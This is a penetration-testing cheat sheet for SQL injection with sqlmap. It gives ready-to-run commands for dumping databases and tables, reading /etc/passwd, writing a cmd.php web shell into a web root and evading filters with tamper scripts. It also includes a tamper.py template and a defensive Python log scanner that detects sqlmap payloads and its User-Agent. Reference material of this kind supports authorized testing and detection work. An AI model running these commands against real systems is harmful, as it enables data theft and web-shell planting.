TLDRBins / SQL Injection


sqlmap

# In Burp Suite, right-click the request and choose `Copy to file` to save it
# Then add `*` to the saved request to mark the SQL injection point

# Initial testing HTTP
sqlmap -r request --batch --banner --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10

# Initial testing HTTPS
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --force-ssl

# Add a string that indicates the injection succeeded (e.g. Invalid User vs Error Occurred)
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --string 'Invalid User'

# Get databases
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --dbs

# Get tables
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --tables

# Dump table
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> -T <TABLE_NAME> --dump

# Dump all tables (slow)
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --dump

# Specify technique
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --technique U

Technique

+------------------------+
| B: Boolean-based blind |
| E: Error-based         |
| U: Union query-based   |
| S: Stacked queries     |
| T: Time-based blind    |
| Q: Inline queries      |
+------------------------+
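Defender-side view of the technique letters above, as an added example that is not part of the original cheat sheet: a Python scanner that tags access-log requests with the technique letter their payload resembles and flags sqlmap's default User-Agent. The regex signatures, log lines, IPs, paths and the version in the User-Agent are constructed assumptions; matching is case-insensitive so `--tamper randomcase` payloads still hit, and payload matching still works when `--random-agent` hides the User-Agent.

```python
import re
from urllib.parse import unquote_plus

# Heuristic signatures keyed by the technique letters above (assumed patterns,
# not sqlmap's payload list). re.I keeps them robust to case randomization.
SIGNATURES = {
    "B": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "E": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "U": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "S": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    "T": re.compile(r"\b(?:SLEEP|PG_SLEEP|BENCHMARK)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
    "Q": re.compile(r"\(\s*SELECT\b", re.I),
}
# Combined log format: client IP, request target and User-Agent.
LOG_LINE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

def classify(target):
    """Return the technique letters whose signature matches the decoded request target."""
    decoded = unquote_plus(target)
    return "".join(k for k, rx in SIGNATURES.items() if rx.search(decoded))

def scan(lines):
    """Map client IP -> {'techniques': set of letters, 'default_ua': bool}."""
    findings = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target, agent = m.groups()
        letters = classify(target)
        default_ua = agent.lower().startswith("sqlmap/")
        if letters or default_ua:
            entry = findings.setdefault(ip, {"techniques": set(), "default_ua": False})
            entry["techniques"].update(letters)
            entry["default_ua"] = entry["default_ua"] or default_ua
    return findings

# Constructed sample access-log lines (documentation IP ranges, invented paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '192.0.2.44 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%20uNiOn%20aLl%20sElEcT%20NULL,NULL--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, sorted(info["techniques"]), "default UA" if info["default_ua"] else "other UA")
```

These patterns are triage heuristics and will produce false positives on ordinary text containing SQL-like phrases, so treat hits as leads to correlate with request volume and response codes.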

Advanced sqlmap

# File write
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-write ./cmd.php --file-dest /var/www/html/cmd.php

# Add payload tamper script, e.g. randomcase
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --tamper randomcase

# Check privileges
sqlmap -r request --privileges

# Read a file
sqlmap -r request --file-read=/etc/passwd

# Write a file
sqlmap -r request --file-write=./test.txt --file-dest=/tmp/test.txt

tamper.py template

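#!/usr/bin/env python3
from lib.core.enums import PRIORITY

# Order in which sqlmap applies this script relative to other tamper scripts
__priority__ = PRIORITY.NORMAL

def dependencies():
    # No special requirements for this template
    pass

def tamper(payload, **kwargs):
    # Return the payload unchanged; modify it here as needed
    return payload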

Note: create an empty __init__.py in the same folder